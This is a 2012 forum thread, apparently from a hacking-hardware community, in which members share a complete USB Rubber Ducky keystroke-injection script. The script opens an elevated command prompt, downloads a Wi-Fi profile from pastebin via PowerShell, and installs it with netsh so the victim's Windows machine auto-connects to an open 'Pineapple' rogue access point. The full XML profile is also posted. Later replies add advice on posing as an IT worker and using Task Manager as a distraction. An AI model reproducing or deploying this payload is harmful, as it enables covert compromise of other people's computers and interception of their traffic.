Xcellerator Posted December 11, 2012 Share Posted December 11, 2012 (edited) Hi guys, I was browsing through a couple of the old payloads on the USB Rubber Ducky wiki and saw that one had been written to associate with the wifi pineapple. The method that was used went through the GUI and took too long. I decided that it must be possible to accomplish using netsh. I threw this script together (originally for my Teensy++, but I rewrote it for the ducky). It uses Mubix' powershell code to download an xml file from pastebin (that I uploaded) and then adds it to the wireless profile using netsh. The whole process takes roughly 6-7 seconds on my Teensy, would be great to hear how you guys get on with it on the ducky! Here is the code: REM Brought to you by XcelleratorDEFAULT_DELAY 200DELAY 3000GUI rSTRING cmdMENUSTRING aENTERLEFTENTERSTRING cd %TEMP%ENTERSTRING powershell (new-object System.Net.WebClient).DownloadFile('http://pastebin.com/raw.php?i=8WsHSWdZ','%TEMP%\a.xml')ENTERDELAY 1000ENTERSTRING netsh wlan add profile filename="a.xml" interface="Wireless Network Connection"ENTERSTRING del a.xmlENTERSTRING exitENTER[/CODE]You can also find it on the wiki https://github.com/h...ion-(VERY-FAST).The Teensy Version can be found here: http://pastebin.com/c9KSdNAe Edited December 12, 2012 by Xcellerator Quote Link to comment Share on other sites More sharing options...
Darren Kitchen Posted December 11, 2012 Share Posted December 11, 2012 I love it! Just to preserve this the XML is listed below: <?xml version="1.0"?><WLANProfile xmlns="http://www.microsoft.com/networking/WLAN/profile/v1"><name>Pineapple</name><SSIDConfig> <SSID> <hex>50696E656170706C65</hex> <name>Pineapple</name> </SSID> <nonBroadcast>false</nonBroadcast></SSIDConfig><connectionType>ESS</connectionType><connectionMode>auto</connectionMode><MSM> <security> <authEncryption> <authentication>open</authentication> <encryption>none</encryption> <useOneX>false</useOneX> </authEncryption> </security></MSM></WLANProfile>[/CODE] Quote Link to comment Share on other sites More sharing options...
Xcellerator Posted December 12, 2012 Author Share Posted December 12, 2012 Thanks, good idea putting up the XML. I uploaded the paste anonymously, so if you wanted to specify an SSID, just change it and make sure you copy in the link to the raw paste in the script... Quote Link to comment Share on other sites More sharing options...
mreidiv Posted December 23, 2012 Share Posted December 23, 2012 Hi guys, I was browsing through a couple of the old payloads on the USB Rubber Ducky wiki and saw that one had been written to associate with the wifi pineapple. The method that was used went through the GUI and took too long. I decided that it must be possible to accomplish using netsh. I threw this script together (originally for my Teensy++, but I rewrote it for the ducky). It uses Mubix' powershell code to download an xml file from pastebin (that I uploaded) and then adds it to the wireless profile using netsh. The whole process takes roughly 6-7 seconds on my Teensy, would be great to hear how you guys get on with it on the ducky! Here is the code: REM Brought to you by XcelleratorDEFAULT_DELAY 200DELAY 3000GUI rSTRING cmdMENUSTRING aENTERLEFTENTERSTRING cd %TEMP%ENTERSTRING powershell (new-object System.Net.WebClient).DownloadFile('http://pastebin.com/raw.php?i=8WsHSWdZ','%TEMP%\a.xml')ENTERDELAY 1000ENTERSTRING netsh wlan add profile filename="a.xml" interface="Wireless Network Connection"ENTERSTRING del a.xmlENTERSTRING exitENTER[/CODE]You can also find it on the wiki https://github.com/h...ion-(VERY-FAST).The Teensy Version can be found here: http://pastebin.com/c9KSdNAe@ XcelleratorI originally wrote that payload and yours looks great, thanks for making a better version as my skills are limited but progressing ever day at school. Quote Link to comment Share on other sites More sharing options...
Xcellerator Posted December 23, 2012 Author Share Posted December 23, 2012 Yeah, I saw your payload and thought it was a great idea! Using task manager as a distraction was a really good too and would be useful for payloads that last longer and run in the background, like PowerShell scripts... Quote Link to comment Share on other sites More sharing options...
mreidiv Posted December 23, 2012 Share Posted December 23, 2012 Yeah i thought that way you could impersonate an it guy and act like you are checking resources in the task manager. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.